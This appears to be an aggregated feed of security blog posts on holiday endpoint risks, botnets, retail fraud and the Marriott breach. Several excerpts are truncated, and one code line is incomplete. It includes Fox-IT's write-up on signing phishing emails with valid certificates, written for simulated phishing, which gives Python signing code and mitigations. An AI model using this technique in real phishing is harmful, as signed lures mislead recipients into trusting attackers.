Suddenly, it’s December, and the beginning of the holiday season. Your coworkers are now distracted with getting in their PTO, flying home to be with family, and completing their shopping lists. But the holiday season isn’t always filled with cheer; it’s got some scrooges too – cybercriminals, who hope to take advantage of the festive fun to find vulnerabilities and infect unsecured devices. And with many employees out of office, these hackers could pose a serious threat to an organization’s endpoints, and thereby its network. As a matter of fact, there are a few key reasons why your organization’s endpoints may be in danger during the holidays. Let’s take a look.

Business Shutdowns

Most companies close down for a handful of days during the holidays, if not a full week or two. That means fewer people manning the IT station, executing updates, and defending the network if cybercriminals manage to find a way inside. A lack of personnel could be just the opportunity cybercriminals need to take advantage of an open entry point and swipe data from an organization essentially undetected.

Holiday Spirit, Relaxed Attitude

For the employees who do stay online during the holidays, attitudes can range from relaxed to inattentive. Unless their product or service directly relates to the holidays and shopping, businesses tend to be quiet during this time. And with many coworkers out, employees have less reason to be glued to their computers. This could mean cyberattacks or necessary security actions go unattended – irregular activity may not seem as obvious, or a necessary software update could go unresolved a little too long. What’s more, the lax attitude could potentially lead to a successful phishing attack. In fact, phishing scams are said to ramp up starting in October, as cybercriminals are eager to time their tricks with the holiday season. To accurately identify a phishing scheme, users have to be aware and keep their eyes on their inbox at all times. One false move could expose the entire organization, creating a huge problem for the reduced staff on hand.

Holiday Travel = Public Wi-Fi

Workplace mobility is a great new aspect of the modern age – it permits employees more flexibility and allows them to work from essentially anywhere in the world. But if employees are working out of a public space – such as a coffee shop or an airport – they are likely using public Wi-Fi, which is one of the most common attack vectors for cybercriminals today. That’s because there are flaws in the encryption standards that secure Wi-Fi networks, and cybercriminals can leverage these to hack into a network and intercept or infect users’ traffic. If an employee is traveling home for the holidays and using public Wi-Fi to get work done along the way, they could expose any private company information that lives on their device.

BYOD in Full Force

Speaking of modern workplace policies, Bring Your Own Device (or BYOD) – a program that allows employees to bring their own personal devices into work – is a common phenomenon these days. With this program, employees’ personal devices connect to the business’ network to work and likely access company data.

That means there is crucial data living on these personal devices, which could be jeopardized when the devices travel outside of the organization. With the holidays, these devices are likely accompanying the employees on their way to visit family, which means they could be left at an airport or hotel. Beyond that, these employees are more likely to access emails and company data through these mobile devices while they are out of the office. And with more connected devices doing company business, there are simply more chances for device and/or data theft.

Staying Secure While Staying Festive

Now, no one wants their employees to be online all the time during the holidays. Fortunately, there are actions organizations can take to ensure their employees and their network are merry and bright, as well as secure. First and foremost, conduct some necessary security training. Put every employee through security training courses so they’re aware of the risks of public Wi-Fi and are reminded to be extra vigilant of phishing emails during this time. Then, make sure all holes are patched and every update has been made before everyone turns their attention to yuletide festivities. Lastly, if an employee is working remotely – remind them to always use a VPN.

No matter who’s in the office and who’s not, it’s important to have always-on security that is armed for the latest zero-day exploits – like McAfee Endpoint Security. You can’t prevent every user from connecting to a public network or one that is set up for phishing, but you can ensure they have an active defense that takes automatic corrective actions. That way, employees can enjoy the time off and return to a safe and secure enterprise come the new year.

To learn more about endpoint security and McAfee’s strategies for it, be sure to follow us at @McAfee and @McAfee_Business.


The post Giving Your Endpoint the Gift of Security This Holiday Season appeared first on McAfee Blogs.

What CES Can Show Us About Evolving Consumer Security Needs: A Timeline

Appropriately dubbed the ‘Global Stage for Innovation,’ it’s no wonder CES showcases the most cutting-edge consumer technologies coming out in the year ahead. No topic is off the table: attendees will learn more about connected homes, smart cities, and self-driving cars; try out shiny new digital health wearables, headsets, and other connected tech; explore AI-driven technologies; and so much more.

Although events like CES showcase breakthrough technologies, interestingly, they also highlight how rapidly new technology is replaced with the next new thing. The rate at which we are treading on new ground is shifting exponentially, and what we see at CES this January might be obsolete in just a few years.

This rapidly changing technological landscape poses a significant predicament to consumers, a ‘digital dilemma’ if you will: as new technologies accelerate and IoT devices that house them progress, new challenges arise with them. This is particularly the case when it comes to security and privacy. And, just as security and products change and adapt, so do our needs and wants as consumers. Those of a teen differ from those of a parent, from those of a baby boomer, and so on. Let’s see how those needs change over time.

A Digital Life Timeline

2015: The Teen Technologist

Born in the late ‘90s, this teen is an everyday gamer who loves to play games online with friends. They also love their smartphone, mostly for the access to social media. A teen wouldn’t necessarily be concerned with security, so having a comprehensive system built in is crucial.

2021: The Young Professional

Entering the workforce for the first time, the young professional is finally able to buy the gadgets that were once luxuries. They might have two phones: one for work and one personal. Additionally, they are bringing more connected devices into their home, so the need for a secure home network has become obvious. They are also always on the go and having to connect to public Wi-Fi, so a Virtual Private Network (VPN) should be considered.

2032: The Concerned Parent

Fast forward almost ten years, and the young professional has become a worried parent. Their kids are spending too much time on screens. Having a way to monitor what they are doing on the internet and limit their time online is crucial, and an application that could provide parental controls would be welcomed. Also, as they bring larger, more connected devices into the home, like smart refrigerators and thermostats, they are excited about a platform that will bake security into the home network.

2038: The Brand Loyalists

The concerned parent has found devices they like and those they do not like. But more importantly, they have found brands they love and may continue to purchase from to bring the latest technology into their family’s lives. A comprehensive security system that covers all types of devices is exactly what they need to keep a layer of protection in place.

2045: The Unacquainted User

At this point in their digital journey, our user has stopped keeping up with trends because things have changed so much, almost to the point where they are unwilling to learn new tech, or are untrusting of it altogether. But the need to maintain their security and privacy is still top of mind, especially as cybercriminals often prey on this demographic as an easy target. A person like this might worry about ransomware, viruses, and identity theft, along with protecting their home network.

As you can see, a person’s security and safety needs, desires, and even their devices evolve with each stage of life. With so much in flux, the last thing anyone wants to think about is security, but with technology changing faster than ever, it’s safe to bet that threats will evolve to keep pace, and so should the ways in which we protect devices. For these reasons, it’s important to leverage a security partner that will keep this in mind, and will grow with not only our evolving needs, but evolving technology, too.

To learn more about consumer security and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post What CES Can Show Us About Evolving Consumer Security Needs: A Timeline appeared first on McAfee Blogs.

Your trust, our signature

Written and researched by Mark Bregman and Rindert Kramer

Sending signed phishing emails

Every organisation, whatever its size, will encounter phishing emails sooner or later. While the number of phishing attacks is increasing every day, the way in which phishing is used within a cyber-attack has not changed: an attacker comes up with a scenario that looks credible enough to persuade the target to perform a certain action, like opening an attachment or clicking on a link in the email. To counter such attacks, the IT or security team will tell users to check for certain things before acting on an email. One of the recommendations is to check whether the email is digitally signed with a valid certificate. However, in this blog, we present an attack that abuses this recommendation to regain the recipient’s trust in the sender.

Traditional phishing

Countless organizations have fallen victim to traditional phishing attacks where the attacker tries to obtain credentials or to infect a computer within the target network. Phishing is a safe way to obtain such footholds for an attacker. The attacker can just send the emails, sit back and wait for the targets to start clicking.

At Fox-IT we receive lots of requests to run simulated phishing attacks, so our team sends out hundreds of thousands of carefully crafted emails every year to clients to simulate phishing campaigns. Whether it’s a blanket campaign against the entire staff or a spear phishing one against targeted individuals, the big issue with phishing stays the same: we need to persuade one person to follow our instructions. We are looking for the weakest link. Sometimes that is easy, sometimes not so much. But an attacker has all the time in the world. If there is no success today, then maybe tomorrow, or the day after…
To create security awareness among employees, IT or the security team will tell their users to take a close look at a wide variety of things upon receiving emails. Some say you have to check for spelling mistakes, others say you have to be careful when you receive an email that tries to force you to do something (“Change your password immediately, or you will lose your files”), or when something is promised (“Please fill in this survey and enter the raffle to win a new iPhone”).

SPF records

Some will tell their users to check the domain that sent the email. But others might argue that anyone can send an email from an arbitrary domain; what’s known as ‘email spoofing’.

Wikipedia defines this as:

Email spoofing is the creation of email messages with a forged sender address. Because the core email protocols do not have any mechanism for authentication, it is common for spam and phishing emails to use such spoofing to mislead the recipient about the origin of the message.

— Wikipedia

This means that an email originating from the domain “ ” may not have been sent by an employee of Fox-IT. This can be mitigated by implementing Sender Policy Framework (SPF) records. In an SPF record you specify which email servers are allowed to send emails on behalf of your domain. If an email originating from the domain “ ” was not sent by an email server specified in the SPF record, the message can be flagged as spam. SPF records thus tell you that the email was sent by an authorized email server; they do not, however, establish the authenticity of the sender. If a company has configured their SMTP server as an open relay, users can send mail on another user’s behalf and still pass the SPF check on the receiver’s end. There are other measures that can be used to identify legitimate mail servers and reduce phishing attacks, such as DKIM and DMARC; however, these are beyond the scope of this blog post.

What is a digital signature?

To tackle the problem of email spoofing some organizations sign their emails with a digital signature. This can be added to an email to give the recipient the ability to validate the sender as well as the integrity of the email message.
For now we’ll focus on validating the sender rather than the message integrity aspect. When the email client receives a signed email, it will check the attached certificate to see who the subject of the certificate is (i.e.: “ “) and whether this matches the originating email address. To verify the authenticity of the digital signature, the email client will also check whether the certificate is issued (signed) by a reputable Certificate Authority (CA). If the certificate is signed by a trusted Certificate Authority, the receiving email client will tell the recipient that the email is signed with a valid certificate. Most email clients will in this case show a green checkmark or a red rosette, like the one in the image below.


By default there is a set of trusted Certificate Authorities in the Windows certificate store. With digital certificates, everything is based on trusting those third parties, the Certificate Authorities. So we trust that the Certificate Authorities in our Windows certificate store give out certificates only after verifying that the certificate subject (i.e.: “ “) is who they say they are. If we receive a signed email with a certificate which is verified by one of the Certificate Authorities we trust, our systems will tell us that the origin of the email is trusted and validated.
Obviously the opposite is also true. If you receive a signed email and the attached certificate is not signed by a Certificate Authority which is in the Windows certificate store, then the signature will be considered invalid. It is possible to attach a self-signed certificate to an email; in which case the email will be signed, but the receiving email client won’t be able to validate the authenticity of the received certificate and therefore will show a warning message to the recipient.


Common misconception regarding email signing

Some IT teams are pushing email signing as the Holy Grail to avoid being caught by a phishing email, because it verifies the sender. And if the sender is verified, we have nothing to worry about.

Unfortunately, the green checkmark or the red rosette which accompanies a validated email signature seems to stimulate the same behavior as we’ve seen with the green padlock accompanying HTTPS websites. Users see the green padlock in their browser and think that the website is absolutely safe. Similarly, they see the green checkmark or the red rosette and make the assumption that everything is safe: it’s a signed email with a valid certificate, the sender is verified, which means everything must be OK and that the email can’t be a phishing attack.

This may be true, if sends you a signed email with a valid certificate: the sender really is Alice from Fox-IT, provided that the private key of the certificate is not compromised. But, if (notice the ‘.cm’ instead of ‘.com’) sends you a signed email with a valid certificate, that person can still be anyone. As long as that person has control over the domain ‘’, they will be able to send signed emails from that domain. Because many users are told that the green checkmark or the red rosette protects against phishing, they may be caught off guard if they receive an email containing a valid certificate.

Sending signed phishing emails

At Fox-IT we’re always trying to innovate, meaning in this case that we’re looking for ways to make the phishing emails in our simulations more appealing to our client’s employees. Adding a valid certificate makes them look genuine and creates a sense of trust. So when running phishing simulations we use virtual private servers to do the job. For each simulation we set up a fresh server with the required configuration in order to deliver the best possible phishing email. To send out the emails, we’ve developed a Python script into which we can feed a template, some variables and a target list. Recently we’ve updated the script to include the ability to sign our phishing emails. This results in very convincing phishing emails. For example, in Microsoft Office Outlook one of our phishing emails would look like this:


This is not limited to Outlook; it works in other mail clients as well, such as Lotus Notes. Although Lotus Notes doesn’t have a red rosette to show the user that an email is digitally signed, there are some indicators present when reading a signed email. As you can see below, the digital signature still adds to the legitimate look of the phishing emails:


Going the extra mile

The user has now received a phishing mail that was signed with a legitimate certificate. To make it look even more genuine, we can mention the certificate in the phishing mail itself. Since the Dutch government has a webpage1 with information about the use of electronic signatures in email, we can write a paragraph that looks something like the one in the image below.


Sign the email

The following (Python) code snippet shows the main signing functionality:

# Import the necessary classes from the M2Crypto library
from M2Crypto import BIO, Rand, SMIME

def makebuf(text):
    return BIO.MemoryBuffer(text)

# msg_str, sender, target and subject are assumed to be set by the
# surrounding script (template body and email parameters).

# Make a MemoryBuffer of the message.
buf = makebuf(msg_str)

# Seed the PRNG.
Rand.load_file('randpool.dat', -1)

# Instantiate an SMIME object; set it up; sign the buffer.
s = SMIME.SMIME()
s.load_key('key.pem', 'cert.pem')
p7 = s.sign(buf, SMIME.PKCS7_DETACHED)

# Recreate buf, as sign() consumed it.
buf = makebuf(msg_str)

# Output p7 in mail-friendly format.
out = BIO.MemoryBuffer()
out.write('From: %s\n' % sender)
out.write('To: %s\n' % target)
out.write('Subject: %s\n' % subject)

s.write(out, p7, buf)
msg =

# Save the PRNG's state.
Rand.save_file('randpool.dat')
This code originates from the Python M2Crypto documentation2

For the above code to work, the following files must be in the same directory as the Python script:
* The public certificate saved as cert.pem
* The private key saved as key.pem

There are many Certificate Authorities that allow you to obtain a certificate online. Some even allow you to request a certificate for your email address for free. A quick Google query for “free email certificate” should give you enough results to start requesting your own certificate. If you have access to the inbox, you’re good to go.
To get an idea of how the above code snippet can be included in a standalone script, we’d like to refer to Fox-IT’s GitHub page, where we’ve uploaded an example script that takes the most basic email parameters (‘from’, ‘to’, ‘subject’ and ‘body’). Don’t forget to place the required certificate and corresponding key file in the same directory as the Python script if you start playing around with the example script. Link to the project on GitHub:


There are some mitigations that can make this type of attack harder to perform for an attacker. We’d like to give you some tips to help protect your organisation.

Prevent domain squatting

The first mitigation is to register domains that look like your own domain. An attacker that sends a phishing mail from a domain name that is similar to your own domain name can trick users into executing malware or giving away their credentials more easily. This type of attack is called domain squatting, which can result in examples like instead of . There are generators that can help you with that, such as:

Restrict Enhanced Key Usages

Another mitigation has a more technical approach. For that we need to look into how certificates are used. Let’s say we have an internal Public Key Infrastructure (PKI) with the following components:
* Root CA
* Subordinate CA

The root CA is an important server in an organisation for maintaining integrity and secrecy. All non-public certificates stem from this server. Most organizations choose to completely isolate their root CA for that reason and use another server, the subordinate CA, to sign certificate requests; the subordinate CA signs certificates on behalf of the root CA.
In Windows, the certificate of the root CA is stored in the Trusted Root Certification Authorities store, while the certificate of the subordinate CA is stored in the Intermediate Certification Authorities store.

Certificates can be used in many scenarios, for example:
* If you want to encrypt files, you can use Encrypted File System (EFS) in Windows. EFS uses a certificate to protect your data from prying eyes.
* If you have a web server, you can use a certificate to establish a secure connection with a client so that all data is transferred securely.
* Stating the obvious: if you want to send email in a secure way, you can also use a certificate to achieve that.

Not every certificate can sign code, encrypt files or send email securely. Certificates have a property, the Enhanced Key Usage (EKU), that states the intended purpose of a certificate. The intended purpose can be one of the actions mentioned above, or a wildcard. A certificate with only an EKU for code signing cannot be used to send email in a secure manner.

By disabling the “Secure Email” EKU for all certification authorities except our own root and subordinate CA, a phishing mail that is signed with a valid certificate from a third-party CA will still trigger a warning stating that the certificate is invalid.
To do that, we must first discover all certificates that support the secure email EKU. This can be done with the following PowerShell one-liner:

# Select all certificates where the EnhancedKeyUsage is empty (Intended Purpose -eq All)
# or where EnhancedKeyUsage contains Secure Email
Get-ChildItem -Path 'Cert:\' -Recurse | Where-Object {$_.GetType().Name -eq 'X509Certificate2' -and ($_.EnhancedKeyUsageList.Count -eq 0 -or $_.EnhancedKeyUsageList.FriendlyName -contains 'Secure Email')} | Select-Object PSParentPath, Subject

We now know which certificates support the Secure Email EKU. In order to disable the Secure Email EKU we have to do some manual labour. It is recommended to apply the following in a base image, group policy or certificate template.

  1. Run mmc with administrative privileges
  2. Go to File, Add or Remove Snap-ins, and select Certificates
  3. Select My user account, followed by OK. Please note that this mitigation requires that certificates in all certificate stores be edited.
  4. Check whether the Intended Purpose column states Secure Email or All
  5. Open the properties of such a certificate and click the Details tab

If the intended purpose at step 4 stated All:
1. Click Key Usage, followed by Edit Properties…
2. Click Enable only the following purposes and uncheck the Secure Email checkbox

If the intended purpose at step 4 stated Secure Email:
1. Click the Enhanced Key Usage property
2. Click Edit Properties…
3. Uncheck the Secure Email checkbox

Please keep the following in mind when implementing these mitigations:
* When a legitimate email has been signed with a certificate issued by a CA from which the Secure Email EKU has been removed, the certificate on that email will not be trusted by Windows
* Changing the EKU may have an impact on the functioning of your systems
* These settings can be reverted by any Windows update
* New or renewed certificates can have the Secure Email EKU as well

This means that in order to only allow your own PKI server to have the Secure Email EKU enabled you must periodically check for certificates that have this EKU configured.

Human factor

With techniques like the one described in this blog post it becomes more and more obvious that users will never be able to withstand all social engineering attacks. In the best case, users will detect and report an attack; in the worst case, they will become victims. It is important to perform awareness exercises and educate users, but we should accept that a percentage of the user base could always fall victim. This means that we (organizations) need to start thinking about new and more user-friendly strategies for combating these types of attacks.

To summarize this blog post:
* An email coming from a given domain does not prove the identity of the sender
* An email that is signed with a trusted and legitimate certificate does not mean that the email can be trusted
* Only if the domain of the sender address is correct and the email has been signed with a valid certificate issued by a trusted CA can the email be trusted.


1: (Dutch)
2: “M2Crypto S/MIME”

VirusTotal += Acronis

We welcome Acronis scanner to VirusTotal. In the words of the company:

“Acronis PE analyzer is Machine Learning based engine to be a part of upcoming cyber protection suite that company will release in 2019. It is a further evolution of Acronis AI capabilities that were introduced in 2018 to combat ransomware. PE analyzer is able to detect any kind of windows PE malware due to optimized innovative machine learning models. Acronis has plans to continuously improve the engine before and after the release of above mentioned cyber protection suite to bring value to all VirusTotal users.”

Acronis has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by AV-TEST, an AMTSO-member tester.

Pay-Per-Exploit Acquisition Vulnerability Programs – Pros and cons?

As ZERODIUM starts paying premium rewards to security researchers to acquire their previously unreported zero-day exploits affecting multiple operating systems, software and/or devices, a logical question emerges in the context of the program's usefulness and potential benefits, including potential vulnerabilities within the actual acquisition process - how would the program undermine the

Historical OSINT – Malicious Economies of Scale – The Emergence of Efficient Platforms for Exploitation – 2007

Dear blog readers, it's been several years since I last posted a quality update following my 2010 disappearance. As it's been quite a significant period of time, I feel it's about time I post a quality update detailing the Web Malware Exploitation market segment circa 2007, prior to my visit to GCHQ as an independent contractor with the Honeynet Project.

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild Serves Scareware

It's 2010 and I've recently stumbled upon a currently active and circulating malicious and fraudulent blackhat SEO campaign successfully enticing hundreds of thousands of users globally into interacting with a multitude of rogue and malicious software, also known as scareware. In this post I'll profile the campaign and discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it and

Historical OSINT – A Diversified Portfolio of Fake Security Software Spotted in the Wild

It's 2010 and I've recently stumbled upon yet another malicious and fraudulent domain portfolio serving a variety of fake security software, also known as scareware, potentially exposing hundreds of thousands of users to it, with the cybercriminals behind the campaign potentially earning fraudulent revenue largely by relying on the utilization of an affiliate-network

Historical OSINT – A Diversified Portfolio of Fake Security Software

It's 2010 and I've recently stumbled upon a currently active and circulating malicious and fraudulent portfolio of fake security software, also known as scareware, potentially enticing hundreds of thousands of users into a multitude of malicious software, with the cybercriminals behind the campaign potentially earning fraudulent revenue in the process of monetizing access to malware-infected hosts

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware

It's 2008 and I've recently stumbled upon a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into falling victim to fake security software, also known as scareware, including a variety of dropped fake codecs, largely relying on the acquisition of legitimate traffic through active blackhat SEO campaigns, in this particular case various North Korea news

Historical OSINT – Spamvertized Swine Flu Domains – Part Two

It's 2010 and I've recently come across a currently active and diverse portfolio of Swine Flu related domains further enticing users into interacting with rogue and malicious content. In this post I'll profile and expose a currently active malicious domain portfolio circulating in the wild, successfully involved in an ongoing variety of Swine Flu malicious spam campaigns, and will

Historical OSINT – Yet Another Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware

It's 2010 and I've recently come across a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into interacting with rogue and fraudulent scareware-serving campaigns. In this post I'll provide actionable intelligence on the infrastructure behind the campaign. Related malicious domains known to have participated in the campaign:

Historical OSINT – Yet Another Massive Blackhat SEO Campaign Spotted in the Wild

It's 2010 and I've recently stumbled upon yet another diverse portfolio of blackhat SEO domains this time serving rogue security software also known as scareware to unsuspecting users with the cybercriminals behind the campaign successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts largely relying on the utilization of an affiliate-network based type

Historical OSINT – Profiling a Portfolio of Active 419-Themed Scams

It's 2010 and I've recently decided to provide actionable intelligence on a variety of 419-themed scams in particular the actual malicious actors behind the campaigns with the idea to empower law enforcement and the community with the necessary data to track down and prosecute the malicious actors behind these campaigns. Related malicious and fraudulent emails known to have participated in the

Historical OSINT – Rogue Scareware Dropping Campaign Spotted in the Wild Courtesy of the Koobface Gang

It's 2010 and I've recently come across a diverse portfolio of fake security software, also known as scareware, courtesy of the Koobface gang, in what appears to be a direct connection between the gang's activities and the Russian Business Network. In this post I'll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics, techniques and procedures of the

Firestarter: Invent Security Review


It’s that time of year again. The time when Amazon takes over our lives. No, not the holiday shopping season but the annual re:Invent conference, where Amazon Web Services takes over Las Vegas (really, all of it) and dumps a firehose of updates on the world. Listen in to hear our take on new services like Transit Gateway, Security Hub, and Control Tower.

Watch or listen:


Ghosts of Botnets Past, Present, and Future

‘Twas the morning of October 21st, and all through the house many IoT devices were stirring, including a connected mouse. Of course, this wasn’t the night before Christmas, but rather the morning of the Dyn attack, the 2016 DDoS attack on the service provider that knocked much of the East Coast offline for a few hours. The root of the attack: botnets, armies of unsecured IoT devices enslaved by Mirai malware. And though this attack made history back in 2016, botnet attacks and the manipulation of vulnerable IoT devices have shown no signs of slowing since. To explore how these attacks have evolved over time, let’s examine the past, present, and future of botnets.

The Past

Any internet-connected device could potentially become part of a botnet. A botnet is an aggregation of connected devices, which could include computers, mobile devices, IoT devices, and more, that have been infected by, and are thereby under the control of, a single malware variant. The owners of these devices are typically unaware their technology has been compromised.

This infection and enslavement process came to a powerful fruition on that fateful October morning, as thousands of devices were manipulated by Mirai malware and transformed into botnets for cybercriminals’ malicious scheme. Cybercriminals used this botnet army to construct one of the largest DDoS attacks in recent history on DNS provider Dyn, which temporarily knocked major sites such as Twitter, Github, and Etsy offline.

The Present

Now, the Dyn attack is arguably one of the most infamous in all of security history. But that doesn’t mean the attacks stopped there. Fast forward to 2018, and botnets are still just as prominent, if not more so. Earlier in the year, we saw Satori emerge, which even borrowed code from Mirai, as well as Hide N Seek (HNS), which has managed to build itself up to 24,000 bots since January 10th.

What’s more, DDoS attacks, which are largely driven by botnets, have also shown no signs of slowing this year. Just take the recent WordPress attack for example, which involved an army of over 20,000 bots attacking sites across the web.

The Future

Botnets don’t just have a past and present; they likely have a future as well. That’s because cybercriminals favor the potency of this ‘infect and enslave’ tactic, so much so that they’re trying to spread it far and wide. Turns out, according to one report, you can even rent an IoT botnet: one Dark Web advertisement offered a 50,000-device botnet for a two-week duration to conduct one-hour attacks, at a rate of $3,000 to $4,000.

The good news is — the cybersecurity industry is preparing for the future of botnet attacks as well. In fact, we’ve engineered technology designed to fight back against the nature of insecure IoT devices — such as our Secure Home Platform solution.

However, a lot of botnet attacks can be stopped by users themselves if they implement strong security practices from the start. This means changing the default passwords on any new IoT device you get, keeping any and all software up to date, always using a firewall to detect unusual behavior, and implementing comprehensive security software to ensure that all your computers and devices have protection.

If users everywhere implement the right processes and products from the start, botnet attacks may eventually become a thing of the past, and won’t ever be part of the present again.

To learn more about IoT device security and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post Ghosts of Botnets Past, Present, and Future appeared first on McAfee Blogs.

Retails’ Nightmare Before Christmas

With the stresses of Black Friday and Cyber Monday shopping behind us, the holiday shopping season of 2018 has almost come to a close. However, despite all of the holiday cheer, something more sinister may be lurking on the horizon: a 14% increase in fraud attempts. This year, holiday shoppers were expected to spend a record $7.8 billion on Cyber Monday deals, a spending peak that coincides with the peak of fraud attempts, as fraudsters sit on the edge of their seats waiting to take hold of consumers’ financial details.

As cross-channel fraud continues to grow, fraudsters are most likely to target shoppers via traditional in-store and online channels; however, the newer option to buy online and pick up in-store has proved inviting as well. Additionally, the increasing number of consumers purchasing high-ticket items this holiday, i.e. smartphones and other tech devices, has also driven the average fraud ticket upward. These are not the only channels being impacted by fraudsters; recent studies have also identified fraudsters directing their aim at the call center.

On the other hand, the growing popularity of smart speakers has opened more doors for shopping capabilities and, by default, more doors for fraud. Among voice device users, 29% are already using them for shopping, with an additional 41% expected to join the trend.

Whether involving the call center, online or traditional channels, some retailers are stepping up their efforts to stop fraud, with three-fifths surveyed stating they are allocating resources to investigating and addressing fraud during the holidays especially.

For more information, check out our on-demand webinar: The Voice Trends and Fraud in Retail.

The post Retails’ Nightmare Before Christmas appeared first on Pindrop.

Question: “Why is Russia so good at getting women into technology?” Answer: Communist Propaganda

It is great to see someone trying to drill into Russia’s technical hiring practices as some sort of example for study or exception, rather than the other way around (why does America suck at allowing women equal treatment). She believes there are several reasons for that: girls are expected to take up computer science …

The Year That Was – Cybersecurity Takeaways From 2018

So, what was 2018 like for you? Just another year, a whirlwind of happiness and heartbreaks, or a momentous one that will stay in your memory forever? In the cyberworld, a lot has happened this year. There were data breaches and bitcoin mining; social media platform hacks and spread of fake news; mass campaigns online and bank/ATM hacks. An eventful year, wouldn’t you say?

As governments around the world explore tightening their cyber security laws, security vendors are working on creating better and stronger tools to keep us safe online. Let’s take a quick look at the major security breaches that occurred over the year. In hindsight, we can better understand where we are failing and what steps we, the consumers, can take to protect our data and identity.

Phishing and data-mining attacks have been so rampant that even those who do not keep up with technology have started to feel the heat. For example, when a large bank’s server was attacked, or the SIM card swap fraud was uncovered, there was chaos everywhere.

Time to recapitulate the attacks that matter most to us, the consumers:

  1. Bank and ATM system hacks
  2. Phishing attacks: via email and social media platforms
  3. DDoS botnet attacks: These attacks were mainly targeted at gaming sites and government websites, severely slowing down operations
  4. Hacking of customer databases: We have noted several significant data breaches over the year, and they have become a major concern for governments, industries and security firms.
  5. IoT attacks: Smart devices are the latest tech additions to our homes, but when these are compromised, it may lead to the compromise of all connected devices. Users should exercise care while downloading apps, because malicious apps can be used to corrupt or control connected devices at home
  6. Public Wi-Fi: Using public Wi-Fi to transmit sensitive information or to carry out financial transactions exposes users to hacking and data theft
  7. Hacking of social media platforms: As most of us are now signed up to one or another popular social media platform, we need to be extra careful about our data privacy and how much information we share online.

As India remains vulnerable to web application attacks, we need to gear up and maximize our security in the virtual space. Not only do we need to follow traditional security measures, but we also need to address new sources of threat like ATM hacks, crypto mining and the takeover of home IoT devices by cyber criminals. Awareness is key: an informed user knows about new threats and the ways to combat them.

Sharing some safety tips to see you securely through the next year:

  • Monitor Digital Assistants – Prevent your digital assistants from becoming attack portals for cyber criminals. Limit the extent of control they have over other devices, if you can. Ensure your home router’s default password is changed, and update your software regularly to patch any security vulnerabilities
  • Password is the key – The safety of your online accounts depends a lot on strong, unique passwords that mix upper case, lower case and symbols, and are at least 12 characters long. Better still, opt for a well-known password manager.
  • Be Mindful – Always research and review apps before downloading. The same goes for new websites, or e-payment gateways. Further, download mobile apps only from genuine stores, like Google Play and Apple’s App Store, for they continually check and take down suspicious apps
  • Secure all your devices – Use a comprehensive security tool to scan content before downloading and send suspicious messages into the spam folder
  • Stay Informed – Stay on top of the latest in cybersecurity by following my blog and @McAfee_Home on Twitter. Don’t forget to listen to our podcast Hackable?


Ciao folks! See you in 2019.

The post The Year That Was – Cybersecurity Takeaways From 2018 appeared first on McAfee Blogs.

Can Hackers Make Drones Drop out of the Sky?

While Amazon hasn’t begun using autonomous drones to deliver packages (yet), the aerial technology is becoming more and more popular. Hobbyists, racers, photographers, and even police departments have registered more than 1 million drones with the FAA. But is the emerging technology secure? 

In the latest episode of “Hackable?”, host Geoff Siskind travels to Johns Hopkins University to investigate. Listen as Geoff flies three different drones while researchers bombard them with cyber attacks. Learn if hackers can make drones drop out of the sky! 

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this high-flying episode.  


The post Can Hackers Make Drones Drop out of the Sky? appeared first on McAfee Blogs.

Marriott Starwood data breach notification de-values customers

It’s never good news when a large organization makes headlines for a cybersecurity incident, but when they keep happening, even the most egregious data exposures become run-of-the-mill.

For example, take the latest record-setting event: the Marriott Starwood data breach, which exposed at least some data of approximately 500 million customers — and enough data to be dangerous to about 327 million of those customers. Not as big as the Yahoo breach reported in 2017, in which all of Yahoo’s users — three billion of them — were exposed. But the impact of the Marriott Starwood data breach is likely far greater.

The Marriott Starwood data breach, starting in 2014 and ongoing until this year, exposed some combination of “name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (‘SPG’) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences” for about 327 million of its customers.

Just five years ago, an enterprise that exposed personal data in a cyberattack would notify its customers — usually, by postal service — and provide access to assistance, which included some form of identity theft monitoring or protection to the violated customers.

We’ve come a long way since the 2013 Target breach, after which the retail giant cleaned up its cybersecurity act and made serious efforts to regain the trust of its customers. After it was breached, Target notified its affected customers, told them they would not be liable for charges made to their cards fraudulently, and offered them a year of free credit monitoring and identity theft protection. This came to be viewed as the baseline for breach response — but Target went beyond that. Target went on the offensive to protect itself and its customers from attack: it was one of the first major U.S. retailers to roll out EMV-compliant point of sale payment terminals and EMV chip and PIN payments cards (the Target REDCard).

Now, the baseline seems to be last year’s Equifax breach, after which it was clear that the consumer credit rating agency not only failed at defending its data but also failed at properly notifying affected consumers while also initially treating the event as a revenue-enhancement opportunity by offering an inadequate protection service for free — for the first year —  which turned into a paid subscription thereafter.

What happened?

Breach fatigue happened. By now, most consumers have had their personal details exposed multiple times by giant corporations, have been notified multiple times of their exposures, and may even have tried using one of the many “first year free” credit monitoring and identity theft protection services.

Even the way Marriott Starwood data breach notifications were sent out to the hundreds of millions of customers whose data was compromised raised questions. While the email Marriott sent out claimed that notifications were being sent out to affected customers “on a rolling basis” starting on Nov. 30, it wasn’t until Dec. 10 that widespread reports of the notification began to surface — including reports that many of those notification messages went directly to the spam folder. For example, Martijn Grooten, the security researcher and editor of Virus Bulletin, tweeted that “If the Marriott breach notification email was marked as spam (as it was for me), here’s a possible reason why,” linking to a Spamhaus article that explained why Marriott’s notifications wound up in spam folders: Marriott used a sender domain for its email notifications — — that looked malicious. And while the notification mentioned that affected customers could enroll with the WebWatcher monitoring service, no link to that service was provided in the notification.

If the pattern hadn’t already been set by data breach responses like those from Yahoo and Equifax and many others like the marketing company Exactis, which also exposed hundreds of millions this year, it would certainly seem as if Marriott is breaking a new trail of arrogance and ignorance, repeating many of the same failures that some enterprises seem to think are acceptable. But the hospitality giant is merely adopting what has become a sorry standard for breach responses.

The post Marriott Starwood data breach notification de-values customers appeared first on Security Bytes.

These Silent Fixes are Silent Killers in Open Source Security

